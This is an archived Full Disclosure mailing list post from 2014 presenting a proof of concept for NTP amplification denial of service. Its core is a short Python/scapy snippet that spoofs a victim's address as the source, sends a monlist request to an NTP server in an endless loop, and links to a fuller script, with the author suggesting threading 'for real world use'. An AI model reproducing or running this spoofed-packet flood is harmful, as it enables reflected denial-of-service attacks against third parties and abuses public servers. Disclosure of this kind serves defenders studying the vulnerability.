Full Disclosure mailing list archives
A more robust POC for the ntp amplification dos
From: rai () openmailbox org
Date: Wed, 16 Jul 2014 09:20:00 +0000
Hi, Even though, the ntp amplification attacks are old, and there are plenty of scripts for checking if vulnerable (eg. the nmap nse script ntp-mon), I had trouble finding a good example script that actually exploited the vuln as would be done in the wild. Eventually I edited a partially written script written by multiple authors. Since it is in python, and uses scapy the key part exploit is as simple as: data = "\x17\x00\x03\x2a" + "\x00" * 4 ...packet = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data)
send(packet,loop=1) For real world use, just add some boilerplate threading to taste: http://maker.fea.st/ntpamp.py -- rai _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- A more robust POC for the ntp amplification dos rai (Jul 16)